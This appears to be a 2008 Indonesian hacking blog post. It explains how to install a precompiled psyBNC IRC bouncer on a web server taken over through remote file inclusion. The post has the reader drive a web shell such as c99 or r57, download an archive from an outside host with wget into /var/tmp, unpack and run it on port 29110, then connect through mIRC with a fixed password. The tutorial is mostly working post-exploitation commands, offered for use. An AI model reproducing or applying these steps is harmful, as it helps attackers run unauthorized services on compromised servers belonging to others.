12.08.2008

Install psyBNC Precompiled di Target RFI

Saya asumsikan kita telah mendapatkan target RFI dengan SAFE MODE OFF. Kenapa yg OFF? Karena fungsi-fungsi system, exec, passhthru, dan popen untuk mengeksekusi perintah shell ini aktif secara default. Nah, bagaimana cara kita mengeksekusi perintah tsb? Yaitu dengan menggunakan injector seperti r57, c99, atau Fx29. Disana kita akan menemukan input box untuk mengetikkan perintah2 shell, biasanya berlabel “Command”, “Run Command”, “Execute Command”, atau semacam itu. Baiklah.. Langsung aja ya..

Pertama kita harus berada di direktori yg full permission, ewh.. Apa itu full permission? Yaitu direktori/folder yg mengizinkan kita utk menulis/meletakkan file didalamnya. Masih bingung? Ya udah, kita langsung aja coba direktori yg biasanya full perm/writable diantaranya /var/tmp/, /var/spool/samba/.

Disini kita menggunakan injector Fx29Sh(klik di sini), untuk pindah ke direktori /var/tmp/ kita tinggal mengetikkannya di input box berlabel “Directory” dan klik tombol “GO”. Skr kita udah berada di direktori /var/tmp/, lalu ketikkan perintah2 dibawah ini di Input yg berlabel “Command”.

1. wget http://feelcomz.freehostia.com/fx.tgz

2. tar -zxvf fx.tgz

3. cd .fx;./config 29110

4. cd .fx;./run

Jika muncul baris dengan pesan “Listening on port 29110″, berarti psyBNC-nya udah jalan. Kemudian kita tes koneksinya di mIRC dengan mengetikkan:
/server 29110

Contoh: /server 127.0.0.1 29110 passgue

Jika berhasil, akan muncul pesan “Welcome to psyBNC” di mIRC kita dan ingat.. Ident/username yg pertama konek adalah admin psyBNC tsb dan password untuk konek ke psyBNC td adalah “passgue”. Untuk konek ke IRC, ketik /addserver irc.cbn.net.id:6667 dan tunggulah sampai psyBNC kita terhubung ke server IRC.

Jika ada pertanyaan seputar tutorial diatas, silahkan posting komentar anda dibawah ini.

Tidak ada komentar:

Posting Komentar

jangan Lupa buat ninggalin comment nya yea. . ..